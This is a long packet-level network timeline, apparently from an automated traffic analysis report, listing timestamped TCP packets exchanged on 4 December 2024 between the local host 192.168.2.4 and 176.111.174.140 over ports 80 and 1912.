                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.086219072 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.086332083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.086378098 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.087352991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.087595940 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.087649107 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.088423967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.088546038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.088593960 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.089545965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.089704037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.089750051 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.090686083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.090743065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.090791941 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.091983080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.092103004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.092159033 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.093085051 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.093203068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.093259096 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.094062090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.094191074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.094238043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.095181942 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.095232964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.095284939 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.096415043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.096559048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.096609116 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.097652912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.097780943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.097829103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.098433018 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.098567009 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.098748922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.099569082 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.099627018 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.099670887 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.100742102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.100877047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.100925922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.101922989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.101998091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.102040052 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.103594065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.103910923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.103925943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.103957891 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.103960037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.104000092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.105005026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.105046988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.105088949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.106168985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.106300116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.106350899 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.107244015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.107381105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.107436895 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.108380079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.108473063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.109438896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.109514952 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.109580994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.109635115 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.110589981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.110814095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.111670971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.111737013 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.111772060 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.111825943 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.112826109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.112900019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.112946033 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.113892078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.114017963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.114068985 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.114928007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.162889957 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.250242949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.250267029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.250368118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.250725031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.250874043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.250921965 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.251840115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.251965046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.252031088 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.252935886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.253128052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.254646063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.254743099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.254919052 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.255270958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.255332947 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.255347013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.255400896 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.256963968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.257023096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.257349014 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.257396936 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.257426977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.257476091 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.258529902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.258687973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.259563923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.259619951 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.259654045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.259704113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.260694981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.260807991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.261754036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.261806011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.261869907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.261923075 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.262907028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.263195038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.263254881 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.263983965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.264075041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.265244961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.265311003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.265331030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.265382051 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.266222000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.266283035 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.266648054 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.267288923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.267388105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.268405914 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.268460035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.268531084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.268582106 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.269642115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.269706964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.269890070 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.270642042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.270821095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.270864010 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.271802902 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.272368908 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.272413969 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.272818089 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.272888899 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.272933006 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.273933887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.274116993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.274350882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.275043011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.275175095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.275219917 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.276174068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.276329041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.276411057 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.277230978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.277350903 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.277401924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.278352976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.278467894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.278512001 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.279464006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.279618025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.279782057 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.280847073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.280900955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.280941963 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.281754971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.281836033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.281877041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.282870054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.282943010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.282995939 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.283968925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.284059048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.284102917 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.285017967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.285160065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.285233974 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.286111116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.286232948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.286274910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.287321091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.287373066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.287420988 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.288335085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.288405895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.288449049 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.289427042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.289555073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.289599895 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.290513992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.290683031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.290730953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.291663885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.291789055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.291835070 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.292743921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.292912006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.292954922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.293840885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.293965101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.294007063 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.294958115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.295034885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.295087099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.296098948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.296199083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.296247005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.297178030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.297272921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.297319889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.298343897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.298432112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.298475027 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.299386978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.299515963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.299678087 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.300453901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.300559044 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.300609112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.301697016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.301793098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.301867008 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.302680969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.302805901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.302855015 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.303849936 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.304092884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.304191113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.305002928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.305125952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.305171013 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.305983067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.306093931 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.306138992 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.307121038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.307292938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.307341099 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.308187008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.348037004 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.350392103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.352509975 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.442447901 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.442600012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.442647934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.442919016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.443001032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.443046093 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.444178104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.444236994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.444281101 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.445157051 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.445223093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.445269108 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.446350098 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.446471930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.446523905 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.447664976 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.447844982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.447892904 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.449088097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.449174881 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.449295044 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.450118065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.450189114 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.450454950 CET4973880192.168.2.4176.111.174.140
